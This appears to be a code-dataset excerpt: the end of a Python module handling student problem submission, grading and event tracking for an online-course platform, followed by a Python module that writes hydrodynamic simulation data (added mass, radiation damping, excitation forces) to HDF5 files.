(e.g. "input" is invalid, but "input_1" is valid)
-Two keys end up with the same name in the returned dict.
(e.g. 'input_1' and 'input_1[]', which both get mapped to 'input_1'
in the returned dict)
"""
answers = dict()
# webob.multidict.MultiDict is a view of a list of tuples,
# so it will return a multi-value key once for each value.
# We only want to consider each key a single time, so we use set(data.keys())
for key in set(data.keys()):
# e.g. input_resistor_1 ==> resistor_1
_, _, name = key.partition('_') # pylint: disable=redefined-outer-name
# If key has no underscores, then partition
# will return (key, '', '')
# We detect this and raise an error
if not name:
raise ValueError(u"{key} must contain at least one underscore".format(key=key))
else:
# This allows for answers which require more than one value for
# the same form input (e.g. checkbox inputs). The convention is that
# if the name ends with '[]' (which looks like an array), then the
# answer will be an array.
# if the name ends with '{}' (Which looks like a dict),
# then the answer will be a dict
is_list_key = name.endswith('[]')
is_dict_key = name.endswith('{}')
name = name[:-2] if is_list_key or is_dict_key else name
if is_list_key:
val = data.getall(key)
elif is_dict_key:
try:
val = json.loads(data[key])
# If the submission wasn't deserializable, raise an error.
except(KeyError, ValueError):
raise ValueError(
u"Invalid submission: {val} for {key}".format(val=data[key], key=key)
)
else:
val = data[key]
# If the name already exists, then we don't want
# to override it. Raise an error instead
if name in answers:
raise ValueError(u"Key {name} already exists in answers dict".format(name=name))
else:
answers[name] = val
return answers
def publish_grade(self):
"""
Publishes the student's current grade to the system as an event
"""
score = self.lcp.get_score()
self.runtime.publish(
self,
'grade',
{
'value': score['score'],
'max_value': score['total'],
}
)
return {'grade': score['score'], 'max_grade': score['total']}
# pylint: disable=too-many-statements
def check_problem(self, data, override_time=False):
"""
Checks whether answers to a problem are correct
Returns a map of correct/incorrect answers:
{'success' : 'correct' | 'incorrect' | AJAX alert msg string,
'contents' : html}
"""
event_info = dict()
event_info['state'] = self.lcp.get_state()
event_info['problem_id'] = self.location.to_deprecated_string()
answers = self.make_dict_of_responses(data)
answers_without_files = convert_files_to_filenames(answers)
event_info['answers'] = answers_without_files
metric_name = u'capa.check_problem.{}'.format
# Can override current time
current_time = datetime.datetime.now(UTC())
if override_time is not False:
current_time = override_time
_ = self.runtime.service(self, "i18n").ugettext
# Too late. Cannot submit
if self.closed():
event_info['failure'] = 'closed'
self.track_function_unmask('problem_check_fail', event_info)
if dog_stats_api:
dog_stats_api.increment(metric_name('checks'), tags=[u'result:failed', u'failure:closed'])
raise NotFoundError(_("Problem is closed."))
# Problem submitted. Student should reset before checking again
if self.done and self.rerandomize == RANDOMIZATION.ALWAYS:
event_info['failure'] = 'unreset'
self.track_function_unmask('problem_check_fail', event_info)
if dog_stats_api:
dog_stats_api.increment(metric_name('checks'), tags=[u'result:failed', u'failure:unreset'])
raise NotFoundError(_("Problem must be reset before it can be checked again."))
# Problem queued. Students must wait a specified waittime before they are allowed to submit
# IDEA: consider stealing code from below: pretty-print of seconds, cueing of time remaining
if self.lcp.is_queued():
prev_submit_time = self.lcp.get_recentmost_queuetime()
waittime_between_requests = self.runtime.xqueue['waittime']
if (current_time - prev_submit_time).total_seconds() < waittime_between_requests:
msg = _(u"You must wait at least {wait} seconds between submissions.").format(
wait=waittime_between_requests)
return {'success': msg, 'html': ''}
# Wait time between resets: check if is too soon for submission.
if self.last_submission_time is not None and self.submission_wait_seconds != 0:
if (current_time - self.last_submission_time).total_seconds() < self.submission_wait_seconds:
remaining_secs = int(self.submission_wait_seconds - (current_time - self.last_submission_time).total_seconds())
msg = _(u'You must wait at least {wait_secs} between submissions. {remaining_secs} remaining.').format(
wait_secs=self.pretty_print_seconds(self.submission_wait_seconds),
remaining_secs=self.pretty_print_seconds(remaining_secs))
return {
'success': msg,
'html': ''
}
try:
correct_map = self.lcp.grade_answers(answers)
self.attempts = self.attempts + 1
self.lcp.done = True
self.set_state_from_lcp()
self.set_last_submission_time()
except (StudentInputError, ResponseError, LoncapaProblemError) as inst:
log.warning("StudentInputError in capa_module:problem_check",
exc_info=True)
# Save the user's state before failing
self.set_state_from_lcp()
# If the user is a staff member, include
# the full exception, including traceback,
# in the response
if self.runtime.user_is_staff:
msg = u"Staff debug info: {tb}".format(tb=cgi.escape(traceback.format_exc()))
# Otherwise, display just an error message,
# without a stack trace
else:
# Translators: {msg} will be replaced with a problem's error message.
msg = _(u"Error: {msg}").format(msg=inst.message)
return {'success': msg}
except Exception as err:
# Save the user's state before failing
self.set_state_from_lcp()
if self.runtime.DEBUG:
msg = u"Error checking problem: {}".format(err.message)
msg += u'\nTraceback:\n{}'.format(traceback.format_exc())
return {'success': msg}
raise
published_grade = self.publish_grade()
# success = correct if ALL questions in this problem are correct
success = 'correct'
for answer_id in correct_map:
if not correct_map.is_correct(answer_id):
success = 'incorrect'
# NOTE: We are logging both full grading and queued-grading submissions. In the latter,
# 'success' will always be incorrect
event_info['grade'] = published_grade['grade']
event_info['max_grade'] = published_grade['max_grade']
event_info['correct_map'] = correct_map.get_dict()
event_info['success'] = success
event_info['attempts'] = self.attempts
event_info['submission'] = self.get_submission_metadata_safe(answers_without_files, correct_map)
self.track_function_unmask('problem_check', event_info)
if dog_stats_api:
dog_stats_api.increment(metric_name('checks'), tags=[u'result:success'])
dog_stats_api.histogram(
metric_name('correct_pct'),
float(published_grade['grade']) / published_grade['max_grade'],
)
dog_stats_api.histogram(
metric_name('attempts'),
self.attempts,
)
if hasattr(self.runtime, 'psychometrics_handler'): # update PsychometricsData using callback
self.runtime.psychometrics_handler(self.get_state_for_lcp())
# render problem into HTML
html = self.get_problem_html(encapsulate=False)
return {
'success': success,
'contents': html
}
# pylint: enable=too-many-statements
def track_function_unmask(self, title, event_info):
"""
All calls to runtime.track_function route through here so that the
choice names can be unmasked.
"""
# Do the unmask translates on a copy of event_info,
# avoiding problems where an event_info is unmasked twice.
event_unmasked = copy.deepcopy(event_info)
self.unmask_event(event_unmasked)
self.runtime.track_function(title, event_unmasked)
def unmask_event(self, event_info):
"""
Translates in-place the event_info to account for masking
and adds information about permutation options in force.
"""
# answers is like: {u'i4x-Stanford-CS99-problem-dada976e76f34c24bc8415039dee1300_2_1': u'mask_0'}
# Each response values has an answer_id which matches the key in answers.
for response in self.lcp.responders.values():
# Un-mask choice names in event_info for masked responses.
if response.has_mask():
# We don't assume much about the structure of event_info,
# but check for the existence of the things we need to un-mask.
# Look for answers/id
answer = event_info.get('answers', {}).get(response.answer_id)
if answer is not None:
event_info['answers'][response.answer_id] = response.unmask_name(answer)
# Look for state/student_answers/id
answer = event_info.get('state', {}).get('student_answers', {}).get(response.answer_id)
if answer is not None:
event_info['state']['student_answers'][response.answer_id] = response.unmask_name(answer)
# Look for old_state/student_answers/id -- parallel to the above case, happens on reset
answer = event_info.get('old_state', {}).get('student_answers', {}).get(response.answer_id)
if answer is not None:
event_info['old_state']['student_answers'][response.answer_id] = response.unmask_name(answer)
# Add 'permutation' to event_info for permuted responses.
permutation_option = None
if response.has_shuffle():
permutation_option = 'shuffle'
elif response.has_answerpool():
permutation_option = 'answerpool'
if permutation_option is not None:
# Add permutation record tuple: (one of:'shuffle'/'answerpool', [as-displayed list])
if 'permutation' not in event_info:
event_info['permutation'] = {}
event_info['permutation'][response.answer_id] = (permutation_option, response.unmask_order())
def pretty_print_seconds(self, num_seconds):
"""
Returns time duration nicely formated, e.g. "3 minutes 4 seconds"
"""
# Here _ is the N variant ungettext that does pluralization with a 3-arg call
ungettext = self.runtime.service(self, "i18n").ungettext
hours = num_seconds // 3600
sub_hour = num_seconds % 3600
minutes = sub_hour // 60
seconds = sub_hour % 60
display = ""
if hours > 0:
display += ungettext("{num_hour} hour", "{num_hour} hours", hours).format(num_hour=hours)
if minutes > 0:
if display != "":
display += " "
# translators: "minute" refers to a minute of time
display += ungettext("{num_minute} minute", "{num_minute} minutes", minutes).format(num_minute=minutes)
# Taking care to make "0 seconds" instead of "" for 0 time
if seconds > 0 or (hours == 0 and minutes == 0):
if display != "":
display += " "
# translators: "second" refers to a second of time
display += ungettext("{num_second} second", "{num_second} seconds", seconds).format(num_second=seconds)
return display
def get_submission_metadata_safe(self, answers, correct_map):
"""
Ensures that no exceptions are thrown while generating input metadata summaries. Returns the
summary if it is successfully created, otherwise an empty dictionary.
"""
try:
return self.get_submission_metadata(answers, correct_map)
except Exception: # pylint: disable=broad-except
# NOTE: The above process requires deep inspection of capa structures that may break for some
# uncommon problem types. Ensure that it does not prevent answer submission in those
# cases. Any occurrences of errors in this block should be investigated and resolved.
log.exception('Unable to gather submission metadata, it will not be included in the event.')
return {}
def get_submission_metadata(self, answers, correct_map):
"""
Return a map of inputs to their corresponding summarized metadata.
Returns:
A map whose keys are a unique identifier for the input (in this case a capa input_id) and
whose values are:
question (str): Is the prompt that was presented to the student. It corresponds to the
label of the input.
answer (mixed): Is the answer the student provided. This may be a rich structure,
however it must be json serializable.
response_type (str): The XML tag of the capa response type.
input_type (str): The XML tag of the capa input type.
correct (bool): Whether or not the provided answer is correct. Will be an empty
string if correctness could not be determined.
variant (str): In some cases the same question can have several different variants.
This string should uniquely identify the variant of the question that was answered.
In the capa context this corresponds to the `seed`.
This function attempts to be very conservative and make very few assumptions about the structure
of the problem. If problem related metadata cannot be located it should be replaced with empty
strings ''.
"""
input_metadata = {}
for input_id, internal_answer in answers.iteritems():
answer_input = self.lcp.inputs.get(input_id)
if answer_input is None:
log.warning('Input id %s is not mapped to an input type.', input_id)
answer_response = None
for response, responder in self.lcp.responders.iteritems():
if input_id in responder.answer_ids:
answer_response = responder
if answer_response is None:
log.warning('Answer responder could not be found for input_id %s.', input_id)
user_visible_answer = internal_answer
if hasattr(answer_input, 'get_user_visible_answer'):
user_visible_answer = answer_input.get_user_visible_answer(internal_answer)
# If this problem has rerandomize enabled, then it will generate N variants of the
# question, one per unique seed value. In this case we would like to know which
# variant was selected. Ideally it would be nice to have the exact question that
# was presented to the user, with values interpolated etc, but that can be done
# later if necessary.
variant = ''
if self.rerandomize != RANDOMIZATION.NEVER:
variant = self.seed
is_correct = correct_map.is_correct(input_id)
if is_correct is None:
is_correct = ''
input_metadata[input_id] = {
'question': getattr(answer_input, 'loaded_attributes', {}).get('label', ''),
'answer': user_visible_answer,
'response_type': getattr(getattr(answer_response, 'xml', None), 'tag', ''),
'input_type': getattr(answer_input, 'tag', ''),
'correct': is_correct,
'variant': variant,
}
return input_metadata
def rescore_problem(self):
"""
Checks whether the existing answers to a problem are correct.
This is called when the correct answer to a problem has been changed,
and the grade should be re-evaluated.
Returns a dict with one key:
{'success' : 'correct' | 'incorrect' | AJAX alert msg string }
Raises NotFoundError if called on a problem that has not yet been
answered, or NotImplementedError if it's a problem that cannot be rescored.
Returns the error messages for exceptions occurring while performing
the rescoring, rather than throwing them.
"""
event_info = {'state': self.lcp.get_state(), 'problem_id': self.location.to_deprecated_string()}
_ = self.runtime.service(self, "i18n").ugettext
if not self.lcp.supports_rescoring():
event_info['failure'] = 'unsupported'
self.track_function_unmask('problem_rescore_fail', event_info)
# Translators: 'rescoring' refers to the act of re-submitting a student's solution so it can get a new score.
raise NotImplementedError(_("Problem's definition does not support rescoring."))
if not self.done:
event_info['failure'] = 'unanswered'
self.track_function_unmask('problem_rescore_fail', event_info)
raise NotFoundError(_("Problem must be answered before it can be graded again."))
# get old score, for comparison:
orig_score = self.lcp.get_score()
event_info['orig_score'] = orig_score['score']
event_info['orig_total'] = orig_score['total']
try:
correct_map = self.lcp.rescore_existing_answers()
except (StudentInputError, ResponseError, LoncapaProblemError) as inst:
log.warning("Input error in capa_module:problem_rescore", exc_info=True)
event_info['failure'] = 'input_error'
self.track_function_unmask('problem_rescore_fail', event_info)
return {'success': u"Error: {0}".format(inst.message)}
except Exception as err:
event_info['failure'] = 'unexpected'
self.track_function_unmask('problem_rescore_fail', event_info)
if self.runtime.DEBUG:
msg = u"Error checking problem: {0}".format(err.message)
msg += u'\nTraceback:\n' + traceback.format_exc()
return {'success': msg}
raise
# rescoring should have no effect on attempts, so don't
# need to increment here, or mark done. Just save.
self.set_state_from_lcp()
self.publish_grade()
new_score = self.lcp.get_score()
event_info['new_score'] = new_score['score']
event_info['new_total'] = new_score['total']
# success = correct if ALL questions in this problem are correct
success = 'correct'
for answer_id in correct_map:
if not correct_map.is_correct(answer_id):
success = 'incorrect'
# NOTE: We are logging both full grading and queued-grading submissions. In the latter,
# 'success' will always be incorrect
event_info['correct_map'] = correct_map.get_dict()
event_info['success'] = success
event_info['attempts'] = self.attempts
self.track_function_unmask('problem_rescore', event_info)
# psychometrics should be called on rescoring requests in the same way as check-problem
if hasattr(self.runtime, 'psychometrics_handler'): # update PsychometricsData using callback
self.runtime.psychometrics_handler(self.get_state_for_lcp())
return {'success': success}
def save_problem(self, data):
"""
Save the passed in answers.
Returns a dict { 'success' : bool, 'msg' : message }
The message is informative on success, and an error message on failure.
"""
event_info = dict()
event_info['state'] = self.lcp.get_state()
event_info['problem_id'] = self.location.to_deprecated_string()
answers = self.make_dict_of_responses(data)
event_info['answers'] = answers
_ = self.runtime.service(self, "i18n").ugettext
# Too late. Cannot submit
if self.closed() and not self.max_attempts == 0:
event_info['failure'] = 'closed'
self.track_function_unmask('save_problem_fail', event_info)
return {
'success': False,
# Translators: 'closed' means the problem's due date has passed. You may no longer attempt to solve the problem.
'msg': _("Problem is closed.")
}
# Problem submitted. Student should reset before saving
# again.
if self.done and self.rerandomize == RANDOMIZATION.ALWAYS:
event_info['failure'] = 'done'
self.track_function_unmask('save_problem_fail', event_info)
return {
'success': False,
'msg': _("Problem needs to be reset prior to save.")
}
self.lcp.student_answers = answers
self.set_state_from_lcp()
self.track_function_unmask('save_problem_success', event_info)
msg = _("Your answers have been saved.")
if not self.max_attempts == 0:
msg = _(
"Your answers have been saved but not graded. Click '{button_name}' to grade them."
).format(button_name=self.check_button_name())
return {
'success': True,
'msg': msg,
}
def reset_problem(self, _data):
"""
Changes problem state to unfinished -- removes student answers,
Causes problem to rerender itself if randomization is enabled.
Returns a dictionary of the form:
{'success': True/False,
'html': Problem HTML string }
If an error occurs, the dictionary will also have an
`error` key containing an error message.
"""
event_info = dict()
event_info['old_state'] = self.lcp.get_state()
event_info['problem_id'] = self.location.to_deprecated_string()
_ = self.runtime.service(self, "i18n").ugettext
if self.closed():
event_info['failure'] = 'closed'
self.track_function_unmask('reset_problem_fail', event_info)
return {
'success': False,
# Translators: 'closed' means the problem's due date has passed. You may no longer attempt to solve the problem.
'error': _("Problem is closed."),
}
if not self.is_submitted():
event_info['failure'] = 'not_done'
self.track_function_unmask('reset_problem_fail', event_info)
return {
'success': False,
# Translators: A student must "make an attempt" to solve the problem on the page before they can reset it.
'error': _("Refresh the page and make an attempt before resetting."),
}
if self.is_submitted() and self.rerandomize in [RANDOMIZATION.ALWAYS, RANDOMIZATION.ONRESET]:
# Reset random number generator seed.
self.choose_new_seed()
# Generate a new problem with either the previous seed or a new seed
self.lcp = self.new_lcp(None)
# Pull in the new problem seed
self.set_state_from_lcp()
event_info['new_state'] = self.lcp.get_state()
self.track_function_unmask('reset_problem', event_info)
return {
'success': True,
'html': self.get_problem_html(encapsulate=False),
}
| agpl-3.0 |
binit92/OpenWARP | Contest_Output/Test_Case_Implementations/Part1/source/automated_test/bemio/io/output.py | 6 | 17798 | import h5py
import numpy as np
from bemio.__version__ import base
def write_hdf5(bemio_obj,out_file=None):
'''
Function that writes NEMOH, WAMIT, or NEMOH data to a standard human
readable data format that uses the HDF5 format. This data can easily be
input into various codes, such as MATLAB, Python, C++, etc. The data can
easily be viewed using `HDFVIEW <https://www.hdfgroup.org/products/java/hdfview/>`_.
Parameters:
data_object : {bemio.io.NemohOutput, bamio.io.WamitOutput, bemio.io.AqwaOutput}
A data object created using the bemio.io data readers
out_file : str, optional
The name of the output file. The file should have the .h5 file
extension
Examples:
This example assumes there is a wamit output file called wamit.out that
is read using the bemio.io.wamit.read function
>>> from bemio.io.wamit import read
>>> from bemio.io.output import write_hdf5
>>> wamit_data = read(out_file=wamit.out)
>>> write_hdf5(wamit_data)
Writing HDF5 data to ./wamit.h5
'''
if out_file is None:
out_file = bemio_obj.files['hdf5']
print 'Writing HDF5 data to ' + out_file
with h5py.File(out_file, "w") as f:
for key, key in enumerate(bemio_obj.body.keys()):
# Body properities
cg = f.create_dataset('body' + str(key+1) + '/properties/cg',data=bemio_obj.body[key].cg)
cg.attrs['units'] = 'm'
cg.attrs['description'] = 'Center of gravity'
cb = f.create_dataset('body' + str(key+1) + '/properties/cb',data=bemio_obj.body[key].cb)
cb.attrs['units'] = 'm'
cb.attrs['description'] = 'Center of buoyancy'
vol = f.create_dataset('body' + str(key+1) + '/properties/disp_vol',data=bemio_obj.body[key].disp_vol)
vol.attrs['units'] = 'm^3'
vol.attrs['description'] = 'Displaced volume'
name = f.create_dataset('body' + str(key+1) + '/properties/name',data=bemio_obj.body[key].name)
name.attrs['description'] = 'Name of rigid body'
num = f.create_dataset('body' + str(key+1) + '/properties/body_number',data=bemio_obj.body[key].body_num)
num.attrs['description'] = 'Number of rigid body from the BEM simulation'
# Hydro coeffs
# Radiation IRF
try:
irf_rad_k_correct_loc = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/impulse_response_fun/K',data=bemio_obj.body[key].rd.irf.K)
irf_rad_k_correct_loc.attrs['units'] = ''
irf_rad_k_correct_loc.attrs['description'] = 'Impulse response function'
irf_rad_t_correct_loc = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/impulse_response_fun/t',data=bemio_obj.body[key].rd.irf.t)
irf_rad_t_correct_loc.attrs['units'] = 'seconds'
irf_rad_t_correct_loc.attrs['description'] = 'Time vector for the impulse response function'
irf_rad_w_correct_loc = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/impulse_response_fun/w',data=bemio_obj.body[key].rd.irf.w)
irf_rad_w_correct_loc.attrs['units'] = 'seconds'
irf_rad_w_correct_loc.attrs['description'] = 'Interpolated frequencies used to compute the impulse response function'
irf_rad_l_correct_loc = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/impulse_response_fun/L',data=bemio_obj.body[key].rd.irf.L)
irf_rad_l_correct_loc.attrs['units'] = ''
irf_rad_l_correct_loc.attrs['description'] = 'Time derivative of the impulse response function'
for m in xrange(bemio_obj.body[key].am.all.shape[0]):
for n in xrange(bemio_obj.body[key].am.all.shape[1]):
irf_rad_l_comp_correct_loc = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/impulse_response_fun/components/L/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].rd.irf.t,bemio_obj.body[key].rd.irf.L[m,n,:]]).transpose())
irf_rad_l_comp_correct_loc.attrs['units'] = ''
irf_rad_l_comp_correct_loc.attrs['description'] = 'Components of the IRF'
irf_rad_k_comp_correct_loc = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/impulse_response_fun/components/K/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].rd.irf.t,bemio_obj.body[key].rd.irf.K[m,n,:]]).transpose())
irf_rad_k_comp_correct_loc.attrs['units'] = ''
irf_rad_k_comp_correct_loc.attrs['description'] = 'Components of the ddt(IRF): K'
except:
print '\tRadiation IRF functions for ' + bemio_obj.body[key].name + ' were not written.'
# Excitation IRF
try:
irf_ex_f = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/impulse_response_fun/f',data=bemio_obj.body[key].ex.irf.f)
irf_ex_f.attrs['units'] = ''
irf_ex_f.attrs['description'] = 'Impulse response function'
irf_ex_t = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/impulse_response_fun/w',data=bemio_obj.body[key].ex.irf.w)
irf_ex_w = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/impulse_response_fun/t',data=bemio_obj.body[key].ex.irf.t)
for m in xrange(bemio_obj.body[key].ex.mag.shape[0]):
for n in xrange(bemio_obj.body[key].ex.mag.shape[1]):
irf_ex_f_comp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/impulse_response_fun/components/f/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].ex.irf.t,bemio_obj.body[key].ex.irf.f[m,n,:]]).transpose())
irf_ex_f_comp.attrs['units'] = ''
irf_ex_f_comp.attrs['description'] = 'Components of the ddt(IRF): f'
except:
print '\tExcitation IRF functions for ' + bemio_obj.body[key].name + ' were not written.'
try:
ssRadfA = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/A/all',data=bemio_obj.body[key].rd.ss.A)
ssRadfA.attrs['units'] = ''
ssRadfA.attrs['description'] = 'State Space A Coefficient'
ssRadfB = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/B/all',data=bemio_obj.body[key].rd.ss.B)
ssRadfB.attrs['units'] = ''
ssRadfB.attrs['description'] = 'State Space B Coefficient'
ssRadfC = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/C/all',data=bemio_obj.body[key].rd.ss.C)
ssRadfC.attrs['units'] = ''
ssRadfC.attrs['description'] = 'State Space C Coefficient'
ssRadfD = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/D/all',data=bemio_obj.body[key].rd.ss.D)
ssRadfD.attrs['units'] = ''
ssRadfD.attrs['description'] = 'State Space D Coefficient'
r2t = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/r2t',data=bemio_obj.body[key].rd.ss.r2t)
r2t.attrs['units'] = ''
r2t.attrs['description'] = 'State space curve fitting R**2 value'
it = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/it',data=bemio_obj.body[key].rd.ss.it)
it.attrs['units'] = ''
it.attrs['description'] = 'Order of state space realization'
for m in xrange(bemio_obj.body[key].am.all.shape[0]):
for n in xrange(bemio_obj.body[key].am.all.shape[1]):
ss_A = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/A/components/' + str(m+1) + '_' + str(n+1),data=bemio_obj.body[key].rd.ss.A[m,n,:,:])
ss_A.attrs['units'] = ''
ss_A.attrs['description'] = 'Components of the State Space A Coefficient'
ss_B = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/B/components/' + str(m+1) + '_' + str(n+1),data=bemio_obj.body[key].rd.ss.B[m,n,:,:])
ss_B.attrs['units'] = ''
ss_B.attrs['description'] = 'Components of the State Space B Coefficient'
ss_C = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/C/components/' + str(m+1) + '_' + str(n+1),data=bemio_obj.body[key].rd.ss.C[m,n,:,:])
ss_C.attrs['units'] = ''
ss_C.attrs['description'] = 'Components of the State Space C Coefficient'
ss_D = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/D/components/' + str(m+1) + '_' + str(n+1),data=bemio_obj.body[key].rd.ss.D[m,n])
ss_D.attrs['units'] = ''
ss_D.attrs['description'] = 'Components of the State Space C Coefficient'
except:
print '\tRadiation state space coefficients for ' + bemio_obj.body[key].name + ' were not written.'
k = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/linear_restoring_stiffness',data=bemio_obj.body[key].k)
k.attrs['units'] = ''
k.attrs['description'] = 'Hydrostatic stiffness matrix'
exMag = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/mag',data=bemio_obj.body[key].ex.mag)
exMag.attrs['units'] = ''
exMag.attrs['description'] = 'Magnitude of excitation force'
exPhase = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/phase',data=bemio_obj.body[key].ex.phase)
exPhase.attrs['units'] = 'rad'
exPhase.attrs['description'] = 'Phase angle of excitation force'
exRe = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/re',data=bemio_obj.body[key].ex.re)
exRe.attrs['units'] = ''
exRe.attrs['description'] = 'Real component of excitation force'
exIm = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/im',data=bemio_obj.body[key].ex.im)
exIm.attrs['units'] = ''
exIm.attrs['description'] = 'Imaginary component of excitation force'
for m in xrange(bemio_obj.body[key].ex.mag.shape[0]):
for n in xrange(bemio_obj.body[key].ex.mag.shape[1]):
irf_ex_f_comp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation//components/mag/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].T,bemio_obj.body[key].ex.mag[m,n,:]]).transpose())
irf_ex_f_comp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation//components/phase/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].T,bemio_obj.body[key].ex.phase[m,n,:]]).transpose())
irf_ex_f_comp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation//components/re/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].T,bemio_obj.body[key].ex.re[m,n,:]]).transpose())
irf_ex_f_comp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation//components/im/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].T,bemio_obj.body[key].ex.im[m,n,:]]).transpose())
# Scattering and FK forces
try:
ex_sc_Mag = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/scattering/mag',data=bemio_obj.body[key].ex.sc.mag)
ex_sc_Mag.attrs['units'] = ''
ex_sc_Mag.attrs['description'] = 'Magnitude of excitation force'
ex_sc_Phase = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/scattering/phase',data=bemio_obj.body[key].ex.sc.phase)
ex_sc_Phase.attrs['units'] = 'rad'
ex_sc_Phase.attrs['description'] = 'Phase angle of excitation force'
ex_sc_Re = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/scattering/re',data=bemio_obj.body[key].ex.sc.re)
ex_sc_Re.attrs['units'] = ''
ex_sc_Re.attrs['description'] = 'Real component of excitation force'
ex_sc_Im = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/scattering/im',data=bemio_obj.body[key].ex.sc.im)
ex_sc_Im.attrs['units'] = ''
ex_sc_Im.attrs['description'] = 'Imaginary component of excitation force'
ex_fk_Mag = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/froud_krylof/mag',data=bemio_obj.body[key].ex.fk.mag)
ex_fk_Mag.attrs['units'] = ''
ex_fk_Mag.attrs['description'] = 'Magnitude of excitation force'
ex_fk_Phase = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/froud_krylof/phase',data=bemio_obj.body[key].ex.fk.phase)
ex_fk_Phase.attrs['units'] = 'rad'
ex_fk_Phase.attrs['description'] = 'Phase angle of excitation force'
ex_fk_Re = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/froud_krylof/re',data=bemio_obj.body[key].ex.fk.re)
ex_fk_Re.attrs['units'] = ''
ex_fk_Re.attrs['description'] = 'Real component of excitation force'
ex_fk_Im = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/froud_krylof/im',data=bemio_obj.body[key].ex.fk.im)
ex_fk_Im.attrs['units'] = ''
ex_fk_Im.attrs['description'] = 'Imaginary component of excitation force'
except:
pass
# Write added mass information
amInf = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/added_mass/inf_freq',data=bemio_obj.body[key].am.inf)
amInf.attrs['units for translational degrees of freedom'] = 'kg'
amInf.attrs['description'] = 'Infinite frequency added mass'
am = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/added_mass/all',data=bemio_obj.body[key].am.all)
am.attrs['units for translational degrees of freedom'] = 'kg'
am.attrs['units for rotational degrees of freedom'] = 'kg-m^2'
am.attrs['description'] = 'Added mass. Frequency is the third dimension of the data structure.'
for m in xrange(bemio_obj.body[key].am.all.shape[0]):
for n in xrange(bemio_obj.body[key].am.all.shape[1]):
amComp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/added_mass/components/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].T, bemio_obj.body[key].am.all[m,n,:]]).transpose())
amComp.attrs['units'] = ''
amComp.attrs['description'] = 'Added mass components as a function of frequency'
radComp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/components/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].T, bemio_obj.body[key].rd.all[m,n,:]]).transpose())
radComp.attrs['units'] = ''
radComp.attrs['description'] = 'Radiation damping components as a function of frequency'
rad = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/all',data=bemio_obj.body[key].rd.all)
rad.attrs['units'] = ''
rad.attrs['description'] = 'Radiation damping. Frequency is the thrid dimension of the data structure.'
# Simulation parameters
g = f.create_dataset('simulation_parameters/g',data=bemio_obj.body[key].g)
g.attrs['units'] = 'm/s^2'
g.attrs['description'] = 'Gravitational acceleration'
rho = f.create_dataset('simulation_parameters/rho',data=bemio_obj.body[key].rho)
rho.attrs['units'] = 'kg/m^3'
rho.attrs['description'] = 'Water density'
T = f.create_dataset('simulation_parameters/T',data=bemio_obj.body[key].T)
T.attrs['units'] = 's'
T.attrs['description'] = 'Wave periods'
w = f.create_dataset('simulation_parameters/w',data=bemio_obj.body[key].w)
w.attrs['units'] = 'rad/s'
w.attrs['description'] = 'Wave frequencies'
water_depth = f.create_dataset('simulation_parameters/water_depth',data=bemio_obj.body[key].water_depth)
water_depth.attrs['units'] = 'm'
water_depth.attrs['description'] = 'Water depth'
wave_dir = f.create_dataset('simulation_parameters/wave_dir',data=bemio_obj.body[key].wave_dir)
wave_dir.attrs['units'] = 'rad'
wave_dir.attrs['description'] = 'Wave direction'
scaled = f.create_dataset('simulation_parameters/scaled',data=bemio_obj.body[key].scaled)
scaled.attrs['description'] = 'True: The data is scaled by rho*g, False: The data is not scaled by rho*g'
